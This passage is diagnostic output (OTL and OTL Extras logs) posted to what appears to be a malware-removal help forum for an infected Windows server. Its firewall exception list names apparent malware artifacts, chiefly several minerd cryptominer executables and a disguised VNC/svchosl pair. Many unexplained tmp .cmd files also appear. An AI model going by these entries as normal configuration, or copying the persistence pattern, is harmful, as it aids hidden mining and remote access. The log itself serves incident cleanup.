[2014/02/10 09:29:43 | 000,021,328 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/02/10 09:29:43 | 000,021,328 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/02/09 08:39:11 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp51.cmd
[2014/02/07 15:08:22 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp44.cmd
[2014/02/06 06:11:52 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp37.cmd
[2014/02/05 11:04:26 | 004,380,160 | ---- | M] () -- C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
[2014/02/05 10:07:04 | 004,121,952 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
[2014/02/05 09:53:16 | 002,080,256 | ---- | M] (Farbar) -- C:\Users\administrator.COMPANY\Desktop\FRST64.exe
[2014/02/04 18:55:23 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp28.cmd
[2014/02/04 05:33:59 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp23.cmd
[2014/02/01 09:08:23 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp16.cmd
[2014/01/30 19:50:10 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp9.cmd
[2014/01/29 14:03:31 | 000,119,000 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/01/29 14:03:13 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/01/29 10:56:07 | 000,600,292 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/01/29 10:56:06 | 000,694,294 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/01/29 10:56:06 | 000,098,966 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/01/29 10:49:17 | 025,804,800 | ---- | M] () -- C:\Windows\SysNative\vmguest.iso
[2014/01/29 10:47:19 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/29 09:39:03 | 000,001,105 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/01/29 09:34:07 | 010,285,040 | ---- | M] (Malwarebytes Corporation                                    ) -- C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
[2014/01/26 20:15:20 | 000,007,629 | ---- | M] () -- C:\Users\administrator.COMPANY\AppData\Local\Resmon.ResmonCfg
[2014/01/26 19:52:27 | 000,001,945 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/01/26 19:52:21 | 000,707,672 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/01/26 19:42:01 | 000,002,275 | ---- | M] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/01/23 12:08:40 | 000,000,890 | ---- | M] () -- C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
[2014/01/23 12:08:18 | 001,536,352 | ---- | M] (Threat Expert Ltd.                                          ) -- C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
[2014/01/23 11:20:16 | 012,589,848 | ---- | M] (Malwarebytes Corp.) -- C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
[2014/01/23 11:10:50 | 001,037,068 | ---- | M] (Thisisu) -- C:\Users\administrator.COMPANY\Desktop\JRT.exe
[2014/01/23 11:06:08 | 001,236,282 | ---- | M] () -- C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
[2014/01/23 11:03:07 | 005,173,757 | ---- | M] (Swearware) -- C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
[2014/01/17 10:49:16 | 000,001,403 | ---- | M] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
 
========== Files Created - No Company Name ==========
 
[2014/02/12 08:08:58 | 000,000,894 | ---- | C] () -- C:\Windows\SysWow64\tmp62.cmd
[2014/02/12 08:01:31 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp61.cmd
[2014/02/11 05:04:06 | 000,000,890 | ---- | C] () -- C:\Windows\SysWow64\tmp59.cmd
[2014/02/11 05:00:38 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp58.cmd
[2014/02/11 04:57:11 | 000,001,462 | ---- | C] () -- C:\Windows\SysWow64\tmp57.cmd
[2014/02/09 08:39:11 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp51.cmd
[2014/02/07 15:08:22 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp44.cmd
[2014/02/06 06:11:52 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp37.cmd
[2014/02/05 11:04:26 | 004,380,160 | ---- | C] () -- C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
[2014/02/04 18:55:23 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp28.cmd
[2014/02/01 09:08:23 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp16.cmd
[2014/01/29 09:39:03 | 000,001,105 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/01/26 20:15:20 | 000,007,629 | ---- | C] () -- C:\Users\administrator.COMPANY\AppData\Local\Resmon.ResmonCfg
[2014/01/26 19:52:17 | 000,001,927 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Forefront Endpoint Protection 2010.lnk
[2014/01/26 19:47:26 | 000,001,990 | -H-- | C] () -- C:\Users\administrator.COMPANY\Documents\Default.rdp
[2014/01/26 19:42:01 | 000,002,275 | ---- | C] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/01/26 02:56:06 | 000,000,912 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/01/26 02:56:06 | 000,000,908 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/01/23 12:08:40 | 000,000,890 | ---- | C] () -- C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
[2014/01/23 11:06:08 | 001,236,282 | ---- | C] () -- C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
[2014/01/21 16:24:52 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp9.cmd
[2014/01/20 15:16:02 | 000,001,945 | ---- | C] () -- C:\Windows\epplauncher.mif
[2014/01/20 15:15:54 | 000,707,672 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/01/17 12:12:24 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp23.cmd
[2014/01/17 10:49:16 | 000,001,403 | ---- | C] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2013/12/01 12:17:10 | 000,010,130 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2009/07/14 05:58:08 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/07/26 03:24:57 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/07/26 02:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 04:24:24 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

< End of report >
 

Link to post
Share on other sites

Extras.T Log:

 

OTL Extras logfile created on: 2/12/2014 2:47:42 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator.COMPANY\Desktop
64bit- Server Standard Edition (full installation) Service Pack 1 (Version = 6.1.7601) - Type = NTServer
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
13.99 Gb Total Physical Memory | 2.37 Gb Available Physical Memory | 16.94% Memory free
27.98 Gb Paging File | 16.20 Gb Available in Paging File | 57.90% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 60.00 Gb Total Space | 31.49 Gb Free Space | 52.49% Space Free | Partition Type: NTFS
Drive D: | 486.80 Gb Total Space | 145.86 Gb Free Space | 29.96% Space Free | Partition Type: NTFS
 
Computer Name: COMPANY-HV | User Name: administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{61F2E994-2307-4EDB-9FD8-FC2671761FD6}" = lport=3389 | protocol=6 | dir=in | name=rdp |
"{65CD34A4-B5F5-45D0-948D-193C87D5E2F6}" = lport=5723 | protocol=6 | dir=in | name=operations manager health service. |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{16E8CF16-C14B-46FD-A69D-48BBCEAEF1CC}" = dir=in | app=%systemroot%\mtc\mtc_minerd32.exe |
"{17F45A38-1DA1-416D-AD62-5FA9B9E89800}" = dir=in | app=%systemroot%\xpm\xpm_minerd32.exe |
"{2BDCC1FF-583A-4889-9217-368DFE7FD7DF}" = dir=in | app=%systemroot%\pts\pts_minerd.exe |
"{4BA5D8AA-E41E-476D-86A2-D37F55373783}" = dir=out | app=%systemroot%\pts\pts_minerd32.exe |
"{5CA8A5F9-B39E-45B3-80E1-CEE3C2979218}" = dir=in | app=%systemroot%\tanechka\realvnc.exe |
"{75A08EE6-03EA-4B12-A3D0-48081187B980}" = dir=in | app=%systemroot%\xpm\xpm_minerd.exe |
"{93D58FB7-CBBC-4869-B15A-C01CA6293474}" = dir=out | app=%systemroot%\xpm\xpm_minerd32.exe |
"{A49A6938-87B8-4832-96E8-F3B585E59502}" = dir=out | app=%systemroot%\mtc\mtc_minerd32.exe |
"{BD32485C-F3A8-4AA5-8CD2-5D36318E93A5}" = dir=out | app=%systemroot%\pts\pts_minerd.exe |
"{BD65746C-07B8-4D6C-BD9C-B54E0BA8EC04}" = dir=in | app=%systemroot%\pts\pts_minerd32.exe |
"{D5FF61DA-DAD1-4814-BA3D-19F6A57E6974}" = dir=out | app=%systemroot%\tanechka\realvnc.exe |
"{E2498AEA-ADD8-46F8-AA0B-036513D318CD}" = dir=in | app=%systemroot%\mtc\mtc_minerd.exe |
"{E5A2FBE6-D0F1-4AA6-8FDC-847CA10026A0}" = dir=out | app=%systemroot%\tanechka\svchosl.exe |
"{EC4365F0-A777-4BD5-9D9D-08A41F65ED36}" = dir=out | app=%systemroot%\mtc\mtc_minerd.exe |
"{F4FC679D-1A41-47E3-BEC3-9A28E9D4724A}" = dir=out | app=%systemroot%\xpm\xpm_minerd.exe |
"{F7BC4FD0-CB22-4D68-B55B-0C3867E651C2}" = dir=in | app=%systemroot%\tanechka\svchosl.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0E0818E4-C87B-4211-9791-E958BD34B96C}" = Microsoft Forefront Endpoint Protection 2010 Server Management
"{0F27A9B5-63FD-43DB-8230-FFE1E9CFE2C4}" = HP Smart Array SAS/SATA Event Notification Service
"{2E97856A-345A-475D-913C-B8A78406BDF6}" = HP Lights-Out Online Configuration Utility
"{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}" = Active Directory Management Pack Helper Object
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{74D49383-7EF9-4FD3-B5B0-73CA22F51CE8}" = HP ProLiant Remote Monitor Service
"{774088D4-0777-4D78-904D-E435B318F5D2}" = Microsoft Antimalware
"{80C2A57A-4193-4800-AA27-CD79553FE9DF}" = System Center 2012 - Operations Manager Gateway
"{B7B52204-2CC8-477A-9C7A-382C31070A62}" = HP Insight Management Agents
"{CF222EB4-4EF7-40F4-A62B-A03E214C20DE}" = HP ProLiant Integrated Management Log Viewer
"{DCEA910B-3269-4F5B-A915-D59293004751}" = HP Insight Diagnostics  Online Edition for Windows
"{E77543EE-6FB5-4FF6-AB70-635392C8C756}" = Microsoft Security Client
"ATI Display Driver" = ATI Display Driver
"Microsoft Security Client" = Microsoft Forefront Endpoint Protection 2010
"ThreatExpert Memory Scanner_is1" = ThreatExpert Memory Scanner 1.0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{14A5045C-33EE-4596-AA69-8761611AE8EB}" = HP Array Configuration Utility CLI
"{173438F5-BD4D-47AE-9C8F-73E6BAA62624}" = PFA Server Registry Update
"{23170F69-40C1-2701-0920-000001000000}" = 7-Zip 9.20
"{34D6E797-AA32-455D-8E65-4EBD1AC9DED7}" = HP ProLiant PCI-express Power Management Update for Windows
"{3C4DF0FD-95CF-4F7B-A816-97CEF616948F}" = HP System Management Homepage
"{4E5563B6-DE0A-4F3B-A5D6-15789FD12D9B}" = Headless Server Registry Update
"{5A5F45AE-0250-4C34-9D89-F10BDDEE665F}" = HP Version Control Agent
"{74C48700-A6A7-4B3D-BD3A-C4E131CDD8E8}" = HP Array Configuration Utility
"{A49F249F-0C91-497F-86DF-B2585E8E76B7}" = Microsoft Visual C++ 2005 Redistributable
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"Google Chrome" = Google Chrome
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 2/8/2014 4:00:29 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-08T20:00:29.104824000Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/9/2014 4:00:17 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/9/2014 4:00:17 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-09T20:00:17.310678600Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/10/2014 4:00:09 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/10/2014 4:00:09 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-10T20:00:09.424823500Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/11/2014 4:00:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/11/2014 4:00:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-11T20:00:10.347412500Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/11/2014 8:18:50 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
Error - 2/11/2014 9:03:21 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
Error - 2/11/2014 9:29:53 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
[ Operations Manager Events ]
Error - 2/9/2014 9:11:53 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:22:23 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:33:57 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:35:03 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21016
Description = OpsMgr was unable to set up a communications channel to scom01.asapnet.local
 and there are no failover hosts.  Communication will resume when scom01.asapnet.local
 is available and communication from this computer is allowed.
 
Error - 2/9/2014 9:38:44 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 10:18:44 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 10:30:52 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 11:36:25 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 11:37:29 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21016
Description = OpsMgr was unable to set up a communications channel to scom01.asapnet.local
 and there are no failover hosts.  Communication will resume when scom01.asapnet.local
 is available and communication from this computer is allowed.
 
Error - 2/9/2014 11:50:53 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
[ System Events ]
Error - 2/10/2014 9:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3760.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 5:52:31 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3760.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 1:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
